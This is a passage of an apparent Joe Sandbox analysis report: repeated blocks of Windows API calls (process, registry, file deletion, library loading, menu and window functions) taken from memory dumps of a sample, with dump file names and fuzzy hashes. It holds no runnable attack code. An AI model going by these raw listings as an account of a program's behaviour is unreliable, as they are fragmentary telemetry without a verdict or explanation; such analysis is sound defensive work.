                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?), ref: 00A534EF
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00A53506
                                                                                                                                                                                                                                                                                                    • GetWindowDC.USER32(?), ref: 00A53512
                                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00A53521
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00A53533
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 00A5354D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A721CC
                                                                                                                                                                                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00A721D8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A721E1
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A721E9
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00A721F2
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A721F9
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A141EA: _wcslen.LIBCMT ref: 00A141EF
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A7CF99
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7CFE0
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A7D047
                                                                                                                                                                                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A7D075
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00A9B903
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A141EA: _wcslen.LIBCMT ref: 00A141EF
                                                                                                                                                                                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00A9B998
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9B9C7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: <$@
                                                                                                                                                                                                                                                                                                    • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A77B6D
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A77BA3
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A77BB4
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A77C36
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0c2c178e94ecd33cc2901ffa5406ec88c92f34b4c32a77443a8fa5b35bc09265
                                                                                                                                                                                                                                                                                                    • Instruction ID: d6255cbd6ce29be466e1e8be830517dac482a8eb0ca93d288526cf0bee7a2954
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c2c178e94ecd33cc2901ffa5406ec88c92f34b4c32a77443a8fa5b35bc09265
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E416EB1604205EFDB16CF64DC84A9E7BB9EF48314F14C0A9AD0A9F246D7B1DD44CBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AA48D1
                                                                                                                                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00AA48E6
                                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AA492E
                                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32 ref: 00AA4941
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: fdae07d835f11ea5b27c5f62621f1127e7e5f9e234e804a2e02a61df4f2c4387
                                                                                                                                                                                                                                                                                                    • Instruction ID: bfe2646aecaeaaeeecb40a7387a4ec9164390de18c8ac4e476f4d00da9a07877
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdae07d835f11ea5b27c5f62621f1127e7e5f9e234e804a2e02a61df4f2c4387
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8416D75A0020AEFDB10CF91D884EABBBB9FF4A325F044119F94597290D770ED55CBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A727B3
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A727C6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A727F6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: ccdd69e7a5abb2102223acf6c01c7e2c18e88671e1432eb69426538036f77130
                                                                                                                                                                                                                                                                                                    • Instruction ID: 28d88c363852ba0109cd06b5b4fa17a4efbf5c776ae291979145f4871ccf6025
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccdd69e7a5abb2102223acf6c01c7e2c18e88671e1432eb69426538036f77130
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4214971900104BFDB08ABA0DC46DFF7BB8DF45360F10C12AF466971E0CB39494A8760
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AA3A29
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00AA3A30
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AA3A45
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00AA3A4D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                    • API String ID: 3529120543-1011021900
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A3508E,?,?,00A3502E,?,00AD98D8,0000000C,00A35185,?,00000002), ref: 00A350FD
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A35110
• FreeLibrary.KERNEL32(00000000,?,?,?,00A3508E,?,?,00A3502E,?,00AD98D8,0000000C,00A35185,?,00000002,00000000), ref: 00A35133
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A1668B,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A1664A
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A1665C
• FreeLibrary.KERNEL32(00000000,?,?,00A1668B,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A1666E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A55657,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A16610
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A16622
• FreeLibrary.KERNEL32(00000000,?,?,00A55657,?,?,00A162FA,?,00000001,?,?,00000000), ref: 00A16635
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A835C4
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00A83646
                                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A8365C
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A8366D
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A8367F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00A9AE87
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A9AE95
                                                                                                                                                                                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A9AEC8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A9B09D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A9C10E,?,?), ref: 00A9D415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A9C505
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A9C560
                                                                                                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A9C5C3
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00A9C606
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00A9C613
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A7D7CD,?), ref: 00A7E714
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A7D7CD,?), ref: 00A7E72D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7EAB0: GetFileAttributesW.KERNEL32(?,00A7D840), ref: 00A7EAB1
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00A7ED8A
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00A7EDC3
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7EF02
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7EF1A
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00A7EF67
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID:
APIs
• VariantInit.OLEAUT32(?), ref: 00A79534
• VariantClear.OLEAUT32 ref: 00A795A5
• VariantClear.OLEAUT32 ref: 00A79604
• VariantClear.OLEAUT32(?), ref: 00A79677
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A796A2
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: 8296dacf6feff3a1426b3e5bf0929012fecb15af74575297cd41720184c1e8aa
• Instruction ID: 950b27adc3dfcaa6880f0ae17662b2d139e23319da8b776e4139881232d47c84
• Opcode Fuzzy Hash: 8296dacf6feff3a1426b3e5bf0929012fecb15af74575297cd41720184c1e8aa
• Instruction Fuzzy Hash: 7D513BB5A00619DFCB14CF58C884EAAB7F9FF89314B15855AE94ADB350E730E911CF90
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A895F3
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00A8961F
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A89677
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A8969C
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A896A4
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: cafa115f2e6c36d0c951c203928ca0ced409f74fa23e472f2ce85a7835a859ce
• Instruction ID: d265898b699dc6375f4573dfe1e6050df80577f783553f6741256b2bda3dc1d2
